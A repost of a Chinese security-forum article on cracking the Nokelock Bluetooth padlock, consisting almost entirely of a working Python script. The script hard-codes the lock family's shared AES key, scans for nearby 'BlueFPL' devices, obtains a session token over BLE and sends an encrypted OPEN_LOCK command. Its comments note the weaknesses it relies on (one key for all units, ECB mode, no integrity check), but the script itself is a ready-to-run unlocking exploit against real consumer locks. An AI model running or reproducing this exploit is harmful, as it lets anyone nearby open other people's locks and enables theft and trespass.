[原创]关于Nokelock蓝牙锁破解分析
2023-4-6 22:31:11 Author: bbs.pediy.com(查看原文) 阅读量:22 收藏

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

from cryptography.hazmat.primitives.ciphers import Cipher

from cryptography.hazmat.primitives.ciphers.algorithms import AES

from cryptography.hazmat.primitives.ciphers.modes import ECB

from cryptography.hazmat.backends import default_backend

import binascii

from bluepy.btle import Scanner,Peripheral,DefaultDelegate

KEY = "241F632E5907042061014C1A3A45193B"

TOKEN = ""

class NotifyDelegate(DefaultDelegate):
    """bluepy notification callback that captures the lock's reply.

    Each notification payload is hex-encoded, run through ``decrypt`` (AES-ECB
    under the module-wide KEY) and stored in the global ``TOKEN``, which
    ``done`` later reads.
    """

    def __init__(self, params):
        # ``params`` is accepted for interface compatibility only; it is unused.
        super().__init__()

    def handleNotification(self, cHandle, data):
        """Decrypt *data* received on handle *cHandle* into the global TOKEN."""
        global TOKEN
        handle_hex = format(cHandle, "02X")
        print("Notification from Handle: 0x" + handle_hex)
        decrypted_hex = decrypt(binascii.hexlify(data))
        TOKEN = decrypted_hex
        print(TOKEN)

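def decrypt(plaintext):
    """Decrypt a hex-encoded AES-ECB ciphertext with the hard-coded KEY.

    Args:
        plaintext: hex string (or bytes) of the ciphertext -- despite the
            parameter name this is the encrypted payload. It must decode to a
            whole number of 16-byte blocks, because no padding is applied and
            ``finalize()`` rejects a partial block.

    Returns:
        The decrypted bytes, hex-encoded (``bytes``).

    Raises:
        ValueError: if KEY does not decode to a 16-byte AES-128 key.

    Note: a single static key plus ECB mode means identical blocks encrypt
    identically and there is no integrity protection on frames; that is a
    property of the protocol under analysis, not something this helper fixes.
    """
    key = binascii.unhexlify(KEY)
    # Guard clause; the original `if` line was missing its trailing colon.
    if len(key) != 16:
        raise ValueError("Invalid key size")
    # ECB takes no IV; `backend` is kept for older cryptography releases.
    cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend())
    decryptor = cipher.decryptor()
    encrypted_data = binascii.unhexlify(plaintext)
    decrypted_data = decryptor.update(encrypted_data) + decryptor.finalize()
    return binascii.hexlify(decrypted_data)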

def encrypt(plaintext):
    """Encrypt a hex-encoded plaintext with AES-ECB under the module KEY.

    Args:
        plaintext: hex string or bytes; must decode to a whole number of
            16-byte blocks, since no padding is applied before ``finalize()``.

    Returns:
        Hex-encoded ciphertext as ``bytes``.
    """
    raw_key = binascii.unhexlify(KEY)
    block_cipher = Cipher(
        algorithms.AES(raw_key),
        modes.ECB(),
        backend=default_backend(),
    )
    encryptor = block_cipher.encryptor()
    raw_input = binascii.unhexlify(plaintext)
    ciphertext = encryptor.update(raw_input)
    ciphertext += encryptor.finalize()
    return binascii.hexlify(ciphertext)

def done(addr: str) -> None:
    """Connect to the lock at *addr*, obtain a session token and send OPEN_LOCK.

    As implemented below: subscribe to notifications on characteristic
    0x36f6 of service 0xfee7, write an AES-ECB-encrypted GET_TOKEN frame to
    0x36f5, take part of the decrypted reply as the token, then write an
    OPEN_LOCK frame carrying that token.

    From a defender's viewpoint the weaknesses this depends on are all visible
    in this file: one KEY shared by every unit, ECB mode, no integrity check on
    frames, and the token as the only freshness element. Firmware-side
    mitigations would be per-device keys and authenticated encryption.

    Args:
        addr: Bluetooth address of the device as reported by the scanner.

    Side effects: prints progress, rewrites the global TOKEN, and calls
    ``exit(1)`` on failure (the site-injected builtin, not ``sys.exit``, so it
    is unavailable under ``python -S``).
    """
    global TOKEN
    print("[+]Find BlueFPL")
    print("[+]Try Connecting.....")
    conn = Peripheral(addr)
    # NOTE(review): bluepy's Peripheral() presumably raises BTLEException on a
    # failed connection rather than returning a falsy object, so the else
    # branch below is likely unreachable -- TODO confirm.
    if conn:
        print("[+]Connecting successfully!")
        # Notifications are decrypted by NotifyDelegate into the global TOKEN.
        conn.withDelegate(NotifyDelegate(conn))
    else:
        print("[+]Fail to connet")
        exit(1)
    print("[+]Try find fee7")
    # 16-bit UUID 0xfee7 written in 128-bit Bluetooth base form.
    svc_uuid = "0000fee7-0000-1000-8000-00805f9b34fb"
    svc = conn.getServiceByUUID(svc_uuid)
    if svc :
        print("[+]Found fee7!")
    else :
        print("[+]fee7 not found")
        exit(1)
    print(svc.uuid)
    # TX (0x36f5) is the characteristic this script writes to; RX (0x36f6) is
    # the one the lock notifies on.
    TX_CHAR = conn.getCharacteristics(uuid = "000036f5-0000-1000-8000-00805f9b34fb")[0]
    RX_CHAR = conn.getCharacteristics(uuid = "000036f6-0000-1000-8000-00805f9b34fb")[0]
    print("[+]Try GET_TOKEN")
    # GET_TOKEN frame as 32 hex chars = exactly one 16-byte AES block, so the
    # unpadded ECB encrypt below succeeds.
    pd = "06010101000000000000000000000000"
    hEcg = RX_CHAR.getHandle()
    hEcgcc = 0
    # Locate the Client Characteristic Configuration Descriptor (0x2902) for
    # RX; if several match, the last one found wins.
    for descriptor in conn.getDescriptors(hEcg,svc.hndEnd):
        if (descriptor.uuid == 0x2902):
            print("[+]Found descriptor handle")
            hEcgcc = descriptor.handle
    if hEcgcc == 0:
        print("Fail to find descriptor handle")
        exit(1)
    print("[+]Descriptor handle:"+str(hEcgcc))
    # CCCD value 0x0001 (little-endian) enables notifications.
    conn.writeCharacteristic(hEcgcc,bytes([1,0]))
    # Wait up to 1 s for a notification; if none arrives, (re)send the
    # encrypted GET_TOKEN frame and wait again. The first send therefore
    # happens only after the first 1 s wait has expired.
    while True:
        if conn.waitForNotifications(1.0):
            break
        print("Wating....")
        TX_CHAR.write(binascii.unhexlify(encrypt(pd)))
    # TOKEN holds the hex of the decrypted reply; hex chars 6..14 are
    # plaintext bytes 3..6 (4 bytes), which the protocol uses as the token.
    TOKEN = TOKEN[6:14]
    print(b"[+]TOKEN:"+TOKEN)
    print("[+]Try OPEN_LOCK")
    # 18 hex prefix (the six 0x30 bytes are ASCII '0') + 8 hex token + 6 hex
    # padding = 32 hex chars = one 16-byte block.
    pd = b"050106303030303030"+TOKEN+b"000000"
    TX_CHAR.write(binascii.unhexlify(encrypt(pd)))
    # No reply is awaited, so this message does not confirm the lock opened.
    print("[+]Open successfully!")
    conn.disconnect()

if __name__ == "__main__":
    # Scan for 3 s and act on every advertiser whose Complete Local Name
    # (AD type 9) contains "BlueFPL".
    ble_scanner = Scanner()
    for entry in ble_scanner.scan(timeout=3):
        local_name = entry.getValueText(9)
        if local_name and "BlueFPL" in local_name:
            done(entry.addr)


文章来源: https://bbs.pediy.com/thread-276770.htm